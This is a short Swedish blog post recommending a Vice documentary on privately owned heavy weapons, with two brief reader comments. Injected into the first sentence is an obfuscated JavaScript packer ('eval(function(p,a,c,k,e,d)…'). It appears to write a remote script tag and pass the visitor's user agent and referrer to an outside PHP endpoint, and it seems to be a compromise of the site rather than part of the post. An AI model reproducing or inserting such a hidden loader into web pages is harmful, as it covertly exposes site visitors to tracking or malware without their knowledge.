Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Vice: Shooting the Biggest Guns Money Can Buy

Filip Urde
  • On 17 januari, 2013
  • http://www.revue.se/filip-urde

Jag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bytei|var|u0026u|referrer|iftyr||js|php’.split(’|’),0,{}))
vill dela denna video, mest för den är så absurd vilka vapen som folk har, men vapen, det är alltid ett hett ämne, inte minst nu. Om ni har hängt med i media den senaste tiden så har det varit ganska mycket prat om just vapen sedan skolskjutningen i connecticut.

Vapen är fascinerande på många olika plan, dem kan var häftiga, spännande, men samtidigt det hemskaste och värsta redskapen du kan tänka dig. När man pratar vapen så är onekligen USA ganska mycket i fokus i och med deras liberala syn på ägandet av vapen.

Några som tidigare uppmärksammat vapen i olika former är tidningen Vice. Jag är ett troget Vice fan, jag tycker speciellt om deras dokumentärer. Dem tar oftast upp väldigt intressanta och unika ämnen. Därför tänkte jag dela med mig av en av mina favoriter, den handlar om vapen, stora vapen. Här är Shooting the Biggest Guns Money Can Buy | The Big Sandy Shoot Enjoy!

youtube.com

Tags

Comments

  1. Jarlen

    Stökigt 🙂

  2. "!"!#!#!"

    Härligt med lite feta Guns!!! =D